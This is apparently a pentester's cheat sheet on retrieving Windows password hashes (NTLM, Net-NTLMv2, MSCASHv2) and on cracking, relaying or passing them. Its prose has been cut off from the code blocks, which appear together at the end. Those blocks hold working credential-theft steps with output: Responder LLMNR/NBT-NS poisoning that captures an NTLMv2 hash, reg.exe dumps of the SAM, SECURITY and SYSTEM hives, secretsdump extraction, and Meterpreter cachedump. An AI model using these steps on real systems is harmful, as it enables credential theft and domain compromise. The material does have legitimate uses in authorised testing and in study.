This page deals with retrieving windows hashes (NTLM, NTLMv1/v2, MSCASHv1/v2).
Introduction
Windows hashes are the way Windows stores passwords on machines. First, let's clarify things.
NTLM (aka NT) hashes are local users hashes
NTLMv1/v2 (aka Net-NTLMv1/v2) hashes are used for network authentication
MSCASHv1/v2 (aka DCCv1/v2) hashes are domain users hashes
NTLM ≠ NTLMv1/v2 ≠ MSCASHv1/v2
Retrieve NTLM hashes
NTLM hashes are composed of two parts:
LM hash (turned off since Windows Vista / Windows 2008)
NT hash (can be lonely, it stays NTLM hash)
NTLM hash
NTLM hashes are stored into SAM database on the machine, or on domain controller's NTDS database. Let's see common techniques to retrieve NTLM hashes.
Dumping SAM database manually
First, get a copy of SAM, SECURITY and SYSTEM hives:
Then retrieve NTLM hashes with secretdump from impacket:
Retrieve and crack NTLM hashes with Meterpreter
On local machines, simply use smart_hashdump:
On domain controllers, two ways to retrieve domain users NTLM hashes:
LSASS injection technique is not a safe and must be avoided!
To crack NTLM hashes, use John integration:
Retrieve NTLM hashes with Mimikatz
Use the following commands into Mimikatz:
These hashes are the NT part. To get full NTLM format, just add the empty LM part: aad3b435b51404eeaad3b435b51404ee:<NThash>
Retrieve NTLM hashes remotely with Secretsdump:
Retrieve NTDS remotely:
You can use secretsdump, again:
Or CrackMapExec:
NTLM hashes can :
be used with Pass-the-Hash technique
be cracked pretty easily
Retrieve NTLMv1/v2 hashes
NTLMv1/v2 hashes are derived from a challenge/response algorithm and are based on the user's NT hash.
Authentication using NTLMv2
Alice access to the share
Fileserver generate a challenge (random number) and send it to Alice
Alice send challenge answer obtained by passing to a function her NTLM hash and the challenge
File server ask domain controller to perform the computation and compare the results
Domain controller says it is ok
Alice can access to the fileserver
NTLMv2 (aka Net-NTLMv2) hash
These hashes can be retrieved with tools like Responder or Inveigh:
NTLMv1/v2 can:
be relayed (with tools like MultiRelay of ntlmrelayx)
be cracked in a reasonable time
be used with Pass-the-Hash technique, no it cannot.
Retrieve MSCASHv1/v2 hashes
Let's say the machine you are trying to connect to cannot access the domain controller to authentication due to network outage or domain server shutdown. You are stuck. To solve that problem, machines stores hashes of the last (10 by default) domain users that logged into the machine. These hashes are MSCASHv2 hashes.
Let's see common techniques to retrieve these hashes.
Dumping SAM database manually
First, get a copy of SAM, SECURITY and SYSTEM hives:
Then retrieve MSCASH hashes with secretdump from impackets:
Retrieve MSCASH hashes with Meterpreter
Simply use cachedump Meterpreter module:
MSCASHv2 can:
be cracked in quite a long time
be used with Pass-the-Hash technique, no it cannot.
root@kali:~/Desktop# responder -I eth0
[+] Listening for events...
[*] [LLMNR] Poisoned answer sent to 192.168.10.60 for name fileserver01
[*] [NBT-NS] Poisoned answer sent to 192.168.10.60 for name FILESERVER01 (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.10.60 for name fileserver01
[SMBv2] NTLMv2-SSP Client : 192.168.10.60
[SMBv2] NTLMv2-SSP Username : WIN01\localadmin
[SMBv2] NTLMv2-SSP Hash : localadmin::WIN01:8d58ff6cd3e9487b:E1AA44B82554D8E7BBA7
29FF28235D3A:0101000000000000C0653150DE09D201EB2E7F13305AD9ED000000000200080053004D00
4200330001001E00570049004E002D0050005200480034003900320052005100410046005600040014005
3004D00420033002E006C006F00630061006C0003003400570049004E002D005000520048003400390032
00520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420
033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000
0000000001000000002000000D7C14F31E5665A6B91C0B30726F3893C57F5973CFB38D5E1EC21ED6820EB
2EB0A001000000000000000000000000000000000000900220063006900660073002F00660069006C0065
0073006500720076006500720030003100000000000000000000000000
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
[...]
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[...]
meterpreter > run post/windows/gather/cachedump
[*] Executing module against CLIENT1
[*] Cached Credentials Setting: - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE_VISTA format. (mscash2)
[*] MSCACHE v2 saved in: /root/.msf4/loot/20140201152655_default_192.168.137.147_mscache2.creds_064400.txt
[*] John the Ripper format:
# mscash2
...
test2:$DCC2$#test2#d7f91bcdec7c0df39396b4efc81123e4:RLUNDTEST2.LOCALt:RLUNDTEST2
